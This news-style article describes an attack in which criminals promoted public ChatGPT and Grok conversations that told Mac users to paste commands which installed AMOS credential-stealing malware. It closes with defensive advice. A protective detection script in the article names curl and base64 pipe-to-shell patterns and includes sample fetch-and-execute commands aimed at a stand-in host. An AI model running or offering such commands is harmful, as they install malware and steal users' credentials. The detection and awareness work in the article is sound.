Hackers Used ChatGPT and Google to Install Malware. Here’s How They Did It

Google searches just became way more dangerous. Hackers found a clever trick that turns AI chatbots into malware delivery systems.

The attack is disturbingly simple. Criminals create fake ChatGPT conversations that give malicious computer commands. Then they pay Google to boost these conversations to the top of search results. When someone searches for basic tech help, they find the poisoned advice and unknowingly install malware.

Security firm Huntress discovered this attack after investigating an infected Mac. The victim had simply searched “clear disk space on Mac” on Google. They clicked what looked like helpful ChatGPT advice. Then they pasted a command into their terminal. That single action installed AMOS malware, which steals passwords and personal data.

The Attack Exploits Trust in AI

What makes this attack so effective? It bypasses every traditional warning sign we’ve learned to watch for.

You don’t download any files. You don’t click suspicious links. You don’t install weird programs. Instead, you just follow advice from two sources you already trust: Google and ChatGPT.

That trust is the weapon. Most people have used Google thousands of times. ChatGPT has dominated headlines for years. So when Google shows you a ChatGPT link at the top of search results, your brain says “this must be legit.”

Huntress tested this attack vector on both ChatGPT and Grok and replicated it on both platforms. Hackers can easily create malicious conversations, make them public, and pay to boost them in search rankings.

Terminal Commands Are the Delivery Method

The core trick relies on getting victims to paste commands into their computer’s terminal or command prompt.

For most people, the terminal looks intimidating. It’s that black screen with white text that shows up in hacker movies. But modern troubleshooting guides often include terminal commands because they’re precise and universal.

So when ChatGPT suggests “just paste this command to free up space,” it feels like standard tech support. The victim has no reason to question it. Plus, the command often contains encoded or obfuscated malware that looks like gibberish to untrained eyes.

Once executed, these commands give hackers remote access to install whatever malware they want. In the documented case, they installed AMOS, which specifically targets Mac users to steal credentials and sensitive data.

Google Left the Malicious Link Up for Hours

Here’s the concerning part. After Huntress published their research exposing this attack, the malicious ChatGPT link stayed live on Google for at least 12 hours.

That means even after security researchers identified and documented the threat, Google’s systems didn’t immediately remove it. Potentially thousands more people could have fallen victim during that window.

This response time raises questions about how quickly Google can react to these emerging threats. Traditional malware distribution through downloads or email gets flagged relatively fast. But malicious AI conversations hiding in plain sight? That’s new territory.

Moreover, while that specific link eventually disappeared, nothing stops attackers from creating hundreds more. The attack method itself remains viable as long as chatbots allow public conversations and Google accepts payment to promote them.

Other AI Platforms Likely Vulnerable Too

Huntress specifically tested ChatGPT and Grok, but other AI assistants probably face similar risks.

Claude, Gemini, Perplexity, and dozens of smaller chatbots all allow conversations that could be weaponized the same way. If users can make chats public and search engines can index them, the attack vector exists.

The problem isn’t really the AI itself. These chatbots generate responses based on prompts. When someone asks “how do I clear disk space,” the AI provides helpful commands. That’s exactly what it’s designed to do.

Instead, the vulnerability exists in the combination of public visibility, paid promotion, and user trust. Attackers exploit the ecosystem around AI, not the technology itself.

How to Protect Yourself Right Now

This threat is active today. So here’s what you need to do immediately.

Never paste commands without understanding them first. If a website or chatbot tells you to paste something into your terminal or browser address bar, stop. Ask yourself: do I know exactly what this command does?

Verify advice through multiple sources. Don’t trust a single ChatGPT conversation, even if Google shows it first. Check official documentation, forums, or ask a tech-savvy friend.

Be extra suspicious of terminal commands. Legitimate tech support rarely requires you to paste complex commands into your terminal. When you see strings of encoded text or unusual characters, that’s a massive red flag.

Question sponsored results. Just because Google shows something first doesn’t mean it’s trustworthy. Attackers paid to put it there. Scroll past ads and look for established tech support resources.

Use common sense with permissions. If pasting a command asks for your administrator password, pause. Legitimate disk cleanup tools don’t typically need elevated permissions.
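The warning signs above can be turned into a quick pre-paste check. The script below is an added example, not code from Huntress or from this article: the rule names and patterns are assumptions chosen to match the signs listed here (encoded text, content piped straight into a shell, requests for elevated permissions), and the sample commands are constructed.

```python
import base64
import re

# Rule names and patterns are this example's own heuristics, based on the
# warning signs the article lists; they are not a vendor signature set.
RULES = [
    ("remote_fetch", re.compile(r"\b(?:curl|wget)\b")),
    ("decode_step", re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")),
    ("encoded_blob", re.compile(r"[A-Za-z0-9+/]{32,}={0,2}")),
    ("pipe_to_interpreter",
     re.compile(r"\|\s*(?:sudo\s+)?(?:bash|zsh|sh|python3?|osascript)\b")),
    ("elevation", re.compile(r"\bsudo\b")),
]


def review_command(cmd: str) -> list[str]:
    """Return the names of every rule the command matches, in rule order."""
    return [name for name, pattern in RULES if pattern.search(cmd)]


def verdict(cmd: str) -> str:
    """'block' when fetched or decoded content is fed straight to an
    interpreter, 'review' for any other match, 'ok' when nothing matches."""
    flags = set(review_command(cmd))
    if "pipe_to_interpreter" in flags and flags & {"remote_fetch", "decode_step"}:
        return "block"
    return "review" if flags else "ok"


# Constructed samples: the blob decodes to harmless text and the URL uses the
# reserved .invalid TLD, so nothing here is a real payload or host.
BLOB = base64.b64encode(b"constructed sample text, not a payload").decode()
SAMPLES = [
    "du -sh ~/Library/Caches",
    "sudo purge",
    "curl -fsSL https://example.invalid/cleanup.sh | sh",
    f"echo '{BLOB}' | base64 -d | bash",
]

if __name__ == "__main__":
    for cmd in SAMPLES:
        print(f"{verdict(cmd):6} {review_command(cmd)}  {cmd[:60]}")
```

An "ok" result only means none of these patterns matched; it does not show that a command is safe to run.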

The Bigger Problem With AI Trust

This attack reveals something uncomfortable about our relationship with AI assistants.

We’ve been conditioned to trust them. Companies spent billions marketing these tools as helpful, smart, and reliable. Now that trust has become a vulnerability that criminals can exploit.

The attack succeeds precisely because ChatGPT and Google have built credibility. Nobody would fall for this if the advice came from “TotallyLegitHackerSite dot ru.” But when it comes from household names? Our guard drops.

Plus, AI makes the scam scalable. Attackers can generate thousands of malicious conversations targeting different search terms. They can customize commands for Windows, Mac, and Linux. They can optimize for different languages and regions.

Traditional phishing required individual attention. But AI-powered attacks can cast a much wider net with minimal effort.

What Needs to Change

Both Google and AI companies need to address this vulnerability fast.

Google should implement better screening for promoted AI content. If someone pays to boost a ChatGPT link, maybe verify that the conversation doesn’t contain malicious commands. That seems like a reasonable safety check before accepting payment.

ChatGPT and other AI platforms should add warnings when conversations include terminal commands. A simple pop-up saying “verify this command before executing it” could prevent infections. Even better, they could analyze commands for known malware patterns.

Meanwhile, search engines need faster response times. Twelve hours between disclosure and removal is too slow when malware is actively spreading. Automated systems should flag suspicious patterns immediately.

But ultimately, user education matters most. We need to teach people that AI assistants aren’t infallible and that Google rankings don’t guarantee safety. Critical thinking remains essential even when technology looks trustworthy.

This attack won’t be the last time criminals weaponize AI. So stay skeptical, verify everything, and never paste commands you don’t fully understand. Your digital safety depends on it.
